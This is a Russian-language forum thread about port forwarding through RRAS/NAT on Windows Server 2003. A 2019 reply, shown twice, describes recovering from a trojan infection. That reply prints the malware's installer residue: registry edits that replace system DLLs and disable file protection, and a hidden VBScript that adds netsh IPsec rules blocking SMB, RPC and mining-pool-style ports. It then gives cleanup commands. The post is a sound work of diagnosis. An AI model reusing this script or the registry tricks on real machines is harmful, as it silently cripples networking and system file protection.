Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Microsoft Windows NT/2000/2003 (http://forum.oszone.net/forumdisplay.php?f=5)
-   -   Как открыть порты в Windows Server 2003 (http://forum.oszone.net/showthread.php?t=209897)

DJ Electronic 26-06-2011 13:38 1701758

Как открыть порты в Windows Server 2003
 
Тема затёртая до дыр но ответа я так и не нашёл, брандмауэр не предлагать, он не работает вместе с RRAS, началось всё с того что сервер раздаёт инет по wifi bluetooth и LAN, решил открыть в NAT порт, вроде бы всё нормально, указал IP машины и порт 8080, ок, не прокатило, ребутнул машину, не прокатило, потом захожу в браузер на сервере лезу на кучу сайтов сканеров портов, все в один голос говорят что все порты закрыты, это как? я охерел если честно, в итоге 2 дня гугла были напрасными, все советы какие были перепробовал и реестр и настройки различного рода, ничег оне помогает, не трогал только брандмауэр, но чтобы его включить нужно вырубить RRAS то есть инет упадёт и тд...

zero55 26-06-2011 20:41 1701929

занятная постановка вопроса...

для того что бы открыть порт
1. его кто то должен слушать
2. на брандмауэре этот порт должен быть разрешен.

я понимаю что
1. вы раздаете по Wifi интернет для неких клиентов
2. сервер имеет RRAS

кто должен и откуда подключаться к порту 8080?

DJ Electronic 26-06-2011 21:45 1701956

да не важно кто просто скажем включаю я на своей машине http file server и скажем по адресу http://10.20.30.40:8080 люди в интеренете должны попадать на сервер, в нат порт прописан на ip моей машины тоесть 192.168.100.10 но толку ноль, начинаю подумывать о линуксе с такими заморочками, но у меня карта wifi D-Link DWA-510 не имеющая аппаратной точки доступа по этому реализовал программную через дрова Rilink а в линуксе даже не представляю что с этой картой делать.

Telepuzik 27-06-2011 09:21 1702155

Цитата:

Цитата DJ Electronic
решил открыть в NAT порт, вроде бы всё нормально, указал IP машины и порт 8080, ок »

Скрин настроек проброски порта покажите.

DJ Electronic 28-06-2011 10:20 1702795

Вложений: 1
Единственное что всё же не пойму почему надписи красуются типа "исключения для брандмауэра" простой брандмауэр в NAT тоже отключён иначе с инета не даёт зайти на машину по RDP, кстати такой вопрос как правильно настроить службу терминалов, вроде всю политику и настройку служб терминалов перелапатил а всё равно заходишь и пользователей двое становится, в диспетчере задач переключаться нужно.

Joni 28-06-2011 11:32 1702847

Ха ))) вот мне тут тоже интересно. никогда не получалось открыть или перекинуть что то в 2003 ))) ставь 2008 там афигительный брандмауэр может все.
Но все же хотел тоже услышать решение.

Telepuzik 28-06-2011 11:55 1702876

DJ Electronic,
Вывод netstat -an | findstr 8080 с машины 192.168.100.10 покажите и на этой машине в настройках файрвола вы разрешили входящие соединения на порт 8080??

Vasosel 28-06-2011 13:06 1702933

Судя по скриншоту, у вас что-то не так в настройках


Судя по окошку с настройкой DNAT-а, у вас частная сеть 192.168.100.0/24
Судя по окошку с конфигурацией адаптера, у вас там прописан шлюз, что для адаптера частной сети делать не следует. Шлюз у роутера должен быть прописан на внешнем интерфейсе.

Интернет-то из внутренней сети наружу работает?

DJ Electronic 28-06-2011 14:55 1703019

ну да между компами сеть 192.168.100.* интернет на машинах в сети работает, а само подключение висит на сервере и конфигурируется при настройке RRAS в виде PPPoE, IP сервера 192.168.100.1 так же как и его шлюз, если на компах в сети которым присвоены различные IP подсети не писать этот шлюз то интернета вообще нет.
P.S. 2008 OS не могу поставить в силу того что она онли x64, а сервер домашний на athlon 1000.

И вообще не в этом дело мы тут ходим сейчас вокруг да около но дело то не только в том что нат коряво работает, скажем даю я роль серверу в виде WEb сервера IIS он как то 90й порт открывает и его видно из вне, так же видно RDP, но если скажем запустить какую то стороннюю утилиту? скажем любой прокси сервер, настроить HTTP по 8080 и SOCKS по 1080 то его из вне не видно!!!! порты системы самой закрыты, как их открыть? Брандмауэр не запущен и не может быть запущен из-за RRAS, где то находил IP Filtering в свойствах службы tcpip, тоже беспонтовая штука никакой роли не играет.

Vasosel 28-06-2011 15:34 1703043

Цитата:

Цитата DJ Electronic
2008 OS не могу поставить в силу того что она онли x64 »

Windows 2008 бывает и x86, но на старом компе могут быть проблемы как с производительностью, так и с дровами

Есть такая шикарная ОС, mikrotik называется, ей и 64 мб оперативки достаточно для работы, и все сетевые заморочки в ней более или менее реализуемы, может посмотрите в сторону неё? (это кагбэ оффтоп, с вопросами по этой теме в личку)

Касательно айпишников понял, не заметил окно терминала на скриншоте ))) Думал, все на одном компьютере происходит.

А что значит "извне"? Локально с того же сервера порт открывается телнетом?

DJ Electronic 28-06-2011 16:53 1703082

извне это значит из интернета, простите кстати не 80й а 90й порт, по команде netstat -an | findstr 8080 ничего не даёт, если запустить http file server и дать ему 8080 порт то выводит это:

C:\Users\SaranskCity>netstat -an | findstr 8080
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING

Ну оно и понятно
Для примера ввёл на сервере её же

C:\Documents and Settings\ADMIN>netstat -an | findstr 8080
TCP 87.119.243.144:4587 87.236.186.106:8080 ESTABLISHED
TCP 87.119.243.144:4647 92.125.227.124:8080 ESTABLISHED

DJ Electronic 28-06-2011 17:20 1703097

я боюсь с mikrotik будут проблемы в плане поднятия точки доступа програмной определения блютуса и тд....вплоть до установки торрентов на него.



В общем бесполезно, сейчас игрался на сервере, RRAS отключил, врубил брандмауэер там добавил в исключение пару портов, перенастроил RRAS добавил в NAT порты, в своём компе в брандмауэре добавил программу в исключения всё ей разрешил и до кучи добавил порт в исключения, не видят люди меня из интернета как в прочем и любой другой сервер поднятый на сервере (как я уже писал выше), не говоря уж а пробросе портов, например веб (апачи), прокси, sql и тд....кроме тех что ставятся в ролях сервера, они как то открывают порты себе, например IIS....


Нашёл 2008, счас поставлю проверим, странно что то, думал x86 нет, видимо это касается R2 и R1

Telepuzik 28-06-2011 20:19 1703202

Цитата:

Цитата DJ Electronic
по команде netstat -an | findstr 8080 ничего не даёт, »

Если у вас по этой команде ничего не выдает, то как у вас тогда должно работать перенаправление портов если на машине на которую пересылаются запросы порт 8080 никто не слушает???

Joni 29-06-2011 10:12 1703448

Цитата:

Цитата Vasosel
Есть такая шикарная ОС, mikrotik »

Ну уж тогда linux поднять свой. микротик аналогичен просто уже полуготов к данным функциям. Зря только платить придется.

Цитата:

Цитата Telepuzik
порт 8080 никто не слушает »

Человек наверное не ответит, ибо доволен 2008м

DJ Electronic 29-06-2011 14:29 1703611

Странно но в 2008 такая же штука

DJ Electronic 29-06-2011 14:48 1703627

Вобщем переместил програмку hfs на сервер, решил ей позадавать разные порты (в ней есть тест), 80й открыт 21 и 22 открыты 8000 8080 закрыты, почему так? Брандмауэр в 2008 работает вместе с RRAS, порты нужные открыл, хотя 80й например не открывал, а он светится

Telepuzik 29-06-2011 15:05 1703640

Цитата:

Цитата DJ Electronic
порты нужные открыл, »

Какой сервис у вас слушает открытые порты?

DJ Electronic 29-06-2011 15:23 1703649

Всё разобрался, сейчас всё работает, с человеком в аське потестил - нормально и на самом сервере и через NAT, похоже веб сервисы по тестированию портов на предмет их открытости тупят.


P.S. Я ещё что то ступил пытался через 23 порт попасть на веб сервер))))

Augur_shi 02-12-2019 14:27 2898772

Добрый день!
В продолжение темы, но как я предполагаю моя информация пригодится не только обладателям серверной ОС.

Дело было на прошлой неделе.
Сначала перестала работать FileZilla Client - при подключении к удалённому серверу проходит обработка имя в адрес сервера и дальше ожидаем подключения (т.е. слушает порт 23) а там тишина. Превышено время ожидания ответа.
Я обратился к хостингу, они ответили что всё нормально проверьте телнетом, проверяю - не работает, проверяю с соседнего компа - работает ( :sorry: , хмм). Ну, думаю, ладно, пусть с этого по сети файлзиле поставлю ссылку на локальные файлы... ага не тут-то было, компьютера в сети не видно. :o
А это не просто компьютер это сервак АД, DHCP, DNS, Dr. Web сервер...
Вот было удивление когда работало всё, и др. веб обновлялся и в ДНС записи вносились, и динамические IP выдавались, сам на сервере сижу через RDP, но вот только сетевое окружение работало только на сервере через раз нормально, остальные ПК в сети не видели 90% времени ни домена ни политики обновить не могли (долго грузились утром при вкл.).
Стал вспоминать, а да точно было какое-то срабатывание на вирусы. Начал искать... в карантине др. вэба лежали trojan.packed2.42046 был найден в файле c:\windows\winupdate32.log
больше ничего, прошел kvrt, обнаружены: HEUR:Trojan.Script.Generic , not-a-virus:HEUR:AdWare.Script.Generic , not-a-virus:HEUR:AdWare.Win32.DealPly.gen и HEUR:Trojan.Win32.Generic (молодец), всё удалил перезагрузка с лечением.

Всё супер вирусов нет, но вот только проблемы остались (когда антивирусники будут возвращать в рабочее состояние изменённые вирусами файлы*****).

Стало понятно, что заблокированы порты. И при открытии файлов (заметил на архивах) стала вылезать надпись " cscdll.dll не найден ".

Дальше следовали 3 дня по поисковикам что да как пробовал разное что есть на форумах:
cscdll.dll нашёл на своём же ПК он был в C:\WINDOWS\ServicePackFiles\i386 и в C:\WINDOWS\system32\dllcache , но его не было в C:\WINDOWS\system32 тупо скопировал и перезагрузился, сообщение о ненайденом cscdll пропало.
Но что же с портами... подумал может троян таки какой-нибудь остался, часто встречал - один вирус приводит приятеля, а тот приводит своего... короче дискотека у них в моём компьютере.
Установил Malwarebytes Anti-Malware проверил, он мне вирусов насобирал и всё удалил, даже в реестре (молодец вообще).
Порты так и остались закрытыми. ОК, начал копать брандмауэр. В службах включил, а в настройках сделал сброс по умолчанию. Не помогло добавил правила для FTP на 21, 22 и 23 поты для TCP и UDP - результат 0.
Параллельно нашёл на сервере папке FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH видать последствия заражения.
Отключал\включал балансировку нагрузки сети, в настройках TCP включал NetBIOS помогало на минуты - компьютеры стали видеть сеть, но не сервак. На сервер нельзя было зайти из сети и шары его соответственно.
Полазил в маршрутизации и удалённом доступе - перестал запускаться брандмауэр, отключил маршрутизацию и удалённый доступ (в оснастке) - брандмауэр заработал, но не помогло.
Заметил в свойствах подключения имеется протокол TCP версия 6, удалил, перезагрузился - не помогло, установил обратно протокол.
Пробовал даже kidokiller - неа...
Пытался узнать что делает найденный троян HEUR:AdWare.Win32.DealPly.gen - нигде ничего.
Поставил PortScan там видно что порты открытые есть, но блин.... ну точно же порты не открытые, telnet показывает что 21 порт закрыт... чем не понятно, ну точно не брандмауэр....
Пробовал удалять сетевое подключение - неа.
Пробовал чинить винсокс программой winsockfix - неа, не оно.
Сегодня подумал надо поискать время заражения и посмотреть что осталось от вирусов. Время нашёл, а вот что осталось от вирусов найти... (молодцы антивирусники - хорошо жахнули).
Сделал поиск и увидел что папка C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH была создана 25 ноября в 11:14, после поиска на диске С всего по дате и упорядочивание по времени дали результат:
нашёл файл MSI246.tmp Открыл его блокнотом и вуаля - всё что делал вирус написано почти членораздельно, ну по крайней мере прочитать можно, что и как изменял вирус в системе.

Содержимое файла MSI246.tmp
 @IXOS @- @НYyO @ @ @ @ @ @ & {80395032-1630-4C4B-A997-0A7CCB72C75B}$ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH SMB2.jpg @ @  @ @ Ђ Ђ& {54900365-375C-422E-B1C5-97195DCA50E3} Ђ Ђ @ @ @  @ @ @Ё  @ $ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH Ђ RollbackАck(WЮVЪnНd\O: Ђ RollbackCleanup Аck(W Rd–YэN‡eцN. . . А‡eцN: [ 1 ] „ @ „ @  ProcessComponents Аck(Wфf°eД~цNиlЊQh€. . .  @ @ @А] & {AA00B7B4-1374-462E-A7CA-5140E25A78C3} C:\WINDOWS\AppPatch\Custom\ @ Ђ @ @ @ 
CreateFolders
Аck(WRъ^‡eцN9Y. . . А‡eцN9Y: [ 1 ] "[ C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\ @ " C:\WINDOWS\AppPatch\Custom\ @  InstallFiles
Аck(W
Y6R°e‡eцN. . . А‡eцN: [ 1 ] 0 оvU_: [ 9 ] 0 'Y\: [ 6 ]  @± @ @  C:\WINDOWS\ 1\WINDOW~1\|WindowsFolder\ ЂАч‹ТceQБxШv: disk1.cab @ Ђ @  C:\WINDOWS\Installer\MSI241.tmp Ђ Ђ Ђ Ђ @  SYSUPD~1.LOG|sysupdate.log
sysupdate.log
sysupdate.log @ @Пя @ Ђ Ђ @ Ђ Ђ Ђ Ђ @ Ђ Ђ @ „ WINUPD~1.LOG|winupdate32.log winupdate32.log winupdate32.log @ @O* @ Ђ Ђ @ Ђ Ђ Ђ Ђ @ Ђ Ђ @ „‡ j @  WriteRegistryValues
Аck(W™QeQы|Я~иlЊQh€<P. . . А.•<P: [ 1 ] я
Tрy: [ 2 ] я<P: [ 3 ]  @ @ @ђ3 $ @ Ђ0 SYSTEM\CurrentControlSet\Control\Session Manager Ђ @ % AllowProtectedRenames #1% PendingFileRenameOperations=\??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\winupdate32.log \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Ke583427.xsl \??\C:\WINDOWS\sysupdate.log \??\C:\WINDOWS\AppPatch\Ke583427.xsl$ @ Ђ5 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Ђ @ %
SFCDisable #4% SFCScan #0$ @ Ђ SOFTWARE\SoundResearch Ђ @ % UpdaterLastTimeChecked1 #1 ExecuteScriptCode Ђ ЂJ ExecuteScriptCode @f Ќ
On Error Resume Next
Set vbs=CreateObject("Wscript.Shell")
vbs.Run "netsh interface ipv6 install",0,True
vbs.Run "netsh ipsec static add policy name=qianye",0,True
vbs.Run "netsh ipsec static add filterlist name=Filter1",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=21 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filteraction name=FilteraAtion1 action=block",0,True
vbs.Run "netsh ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1",0,True
vbs.Run "netsh ipsec static set policy name=qianye assign=y",0,True @ @ @®qІ


Эта гадость подменила через реестр системные файлы, установила ТСР в. 6, и добавила правило с блокировкой портов.
Короче лечится так:

1. в командной строке вводим
netsh interface ipv6 uninstall

либо просто удалить протокол в настройках подключения

2. перезагрузка

3. в командной строке вводим
netsh ipsec static delete all



P.S. неделя выноса мозга, а всего две команды надо.

Добрый день!
В продолжение темы, но как я предполагаю моя информация пригодится не только обладателям серверной ОС.

Дело было на прошлой неделе.
Сначала перестала работать FileZilla Client - при подключении к удалённому серверу проходит обработка имя в адрес сервера и дальше ожидаем подключения (т.е. слушает порт 23) а там тишина. Превышено время ожидания ответа.
Я обратился к хостингу, они ответили что всё нормально проверьте телнетом, проверяю - не работает, проверяю с соседнего компа - работает ( :sorry: , хмм). Ну, думаю, ладно, пусть с этого по сети файлзиле поставлю ссылку на локальные файлы... ага не тут-то было, компьютера в сети не видно. :o
А это не просто компьютер это сервак АД, DHCP, DNS, Dr. Web сервер...
Вот было удивление когда работало всё, и др. веб обновлялся и в ДНС записи вносились, и динамические IP выдавались, сам на сервере сижу через RDP, но вот только сетевое окружение работало только на сервере через раз нормально, остальные ПК в сети не видели 90% времени ни домена ни политики обновить не могли (долго грузились утром при вкл.).
Стал вспоминать, а да точно было какое-то срабатывание на вирусы. Начал искать... в карантине др. вэба лежали trojan.packed2.42046 был найден в файле c:\windows\winupdate32.log
больше ничего, прошел kvrt, обнаружены: HEUR:Trojan.Script.Generic , not-a-virus:HEUR:AdWare.Script.Generic , not-a-virus:HEUR:AdWare.Win32.DealPly.gen и HEUR:Trojan.Win32.Generic (молодец), всё удалил перезагрузка с лечением.

Всё супер вирусов нет, но вот только проблемы остались (когда антивирусники будут возвращать в рабочее состояние изменённые вирусами файлы*****).

Стало понятно, что заблокированы порты. И при открытии файлов (заметил на архивах) стала вылезать надпись " cscdll.dll не найден ".

Дальше следовали 3 дня по поисковикам что да как пробовал разное что есть на форумах:
cscdll.dll нашёл на своём же ПК он был в C:\WINDOWS\ServicePackFiles\i386 и в C:\WINDOWS\system32\dllcache , но его не было в C:\WINDOWS\system32 тупо скопировал и перезагрузился, сообщение о ненайденом cscdll пропало.
Но что же с портами... подумал может троян таки какой-нибудь остался, часто встречал - один вирус приводит приятеля, а тот приводит своего... короче дискотека у них в моём компьютере.
Установил Malwarebytes Anti-Malware проверил, он мне вирусов насобирал и всё удалил, даже в реестре (молодец вообще).
Порты так и остались закрытыми. ОК, начал копать брандмауэр. В службах включил, а в настройках сделал сброс по умолчанию. Не помогло добавил правила для FTP на 21, 22 и 23 поты для TCP и UDP - результат 0.
Параллельно нашёл на сервере папке FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH видать последствия заражения.
Отключал\включал балансировку нагрузки сети, в настройках TCP включал NetBIOS помогало на минуты - компьютеры стали видеть сеть, но не сервак. На сервер нельзя было зайти из сети и шары его соответственно.
Полазил в маршрутизации и удалённом доступе - перестал запускаться брандмауэр, отключил маршрутизацию и удалённый доступ (в оснастке) - брандмауэр заработал, но не помогло.
Заметил в свойствах подключения имеется протокол TCP версия 6, удалил, перезагрузился - не помогло, установил обратно протокол.
Пробовал даже kidokiller - неа...
Пытался узнать что делает найденный троян HEUR:AdWare.Win32.DealPly.gen - нигде ничего.
Поставил PortScan там видно что порты открытые есть, но блин.... ну точно же порты не открытые, telnet показывает что 21 порт закрыт... чем не понятно, ну точно не брандмауэр....
Пробовал удалять сетевое подключение - неа.
Пробовал чинить винсокс программой winsockfix - неа, не оно.
Сегодня подумал надо поискать время заражения и посмотреть что осталось от вирусов. Время нашёл, а вот что осталось от вирусов найти... (молодцы антивирусники - хорошо жахнули).
Сделал поиск и увидел что папка C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH была создана 25 ноября в 11:14, после поиска на диске С всего по дате и упорядочивание по времени дали результат:
нашёл файл MSI246.tmp Открыл его блокнотом и вуаля - всё что делал вирус написано почти членораздельно, ну по крайней мере прочитать можно, что и как изменял вирус в системе.

Содержимое файла MSI246.tmp
 @IXOS @- @НYyO @ @ @ @ @ @ & {80395032-1630-4C4B-A997-0A7CCB72C75B}$ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH SMB2.jpg @ @  @ @ Ђ Ђ& {54900365-375C-422E-B1C5-97195DCA50E3} Ђ Ђ @ @ @  @ @ @Ё  @ $ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH Ђ RollbackАck(WЮVЪnНd\O: Ђ RollbackCleanup Аck(W Rd–YэN‡eцN. . . А‡eцN: [ 1 ] „ @ „ @  ProcessComponents Аck(Wфf°eД~цNиlЊQh€. . .  @ @ @А] & {AA00B7B4-1374-462E-A7CA-5140E25A78C3} C:\WINDOWS\AppPatch\Custom\ @ Ђ @ @ @ 
CreateFolders
Аck(WRъ^‡eцN9Y. . . А‡eцN9Y: [ 1 ] "[ C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\ @ " C:\WINDOWS\AppPatch\Custom\ @  InstallFiles
Аck(W
Y6R°e‡eцN. . . А‡eцN: [ 1 ] 0 оvU_: [ 9 ] 0 'Y\: [ 6 ]  @± @ @  C:\WINDOWS\ 1\WINDOW~1\|WindowsFolder\ ЂАч‹ТceQБxШv: disk1.cab @ Ђ @  C:\WINDOWS\Installer\MSI241.tmp Ђ Ђ Ђ Ђ @  SYSUPD~1.LOG|sysupdate.log
sysupdate.log
sysupdate.log @ @Пя @ Ђ Ђ @ Ђ Ђ Ђ Ђ @ Ђ Ђ @ „ WINUPD~1.LOG|winupdate32.log winupdate32.log winupdate32.log @ @O* @ Ђ Ђ @ Ђ Ђ Ђ Ђ @ Ђ Ђ @ „‡ j @  WriteRegistryValues
Аck(W™QeQы|Я~иlЊQh€<P. . . А.•<P: [ 1 ] я
Tрy: [ 2 ] я<P: [ 3 ]  @ @ @ђ3 $ @ Ђ0 SYSTEM\CurrentControlSet\Control\Session Manager Ђ @ % AllowProtectedRenames #1% PendingFileRenameOperations=\??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\winupdate32.log \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Ke583427.xsl \??\C:\WINDOWS\sysupdate.log \??\C:\WINDOWS\AppPatch\Ke583427.xsl$ @ Ђ5 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Ђ @ %
SFCDisable #4% SFCScan #0$ @ Ђ SOFTWARE\SoundResearch Ђ @ % UpdaterLastTimeChecked1 #1 ExecuteScriptCode Ђ ЂJ ExecuteScriptCode @f Ќ
On Error Resume Next
Set vbs=CreateObject("Wscript.Shell")
vbs.Run "netsh interface ipv6 install",0,True
vbs.Run "netsh ipsec static add policy name=qianye",0,True
vbs.Run "netsh ipsec static add filterlist name=Filter1",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=21 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filteraction name=FilteraAtion1 action=block",0,True
vbs.Run "netsh ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1",0,True
vbs.Run "netsh ipsec static set policy name=qianye assign=y",0,True @ @ @®qІ


Эта гадость подменила через реестр системные файлы, установила ТСР в. 6, и добавила правило с блокировкой портов.
Короче лечится так:

1. в командной строке вводим
netsh interface ipv6 uninstall

либо просто удалить протокол в настройках подключения

2. перезагрузка

3. в командной строке вводим
netsh ipsec static delete all



P.S. неделя выноса мозга, а всего две команды надо.


Время: 12:39.

Время: 12:39.
© OSzone.net 2001-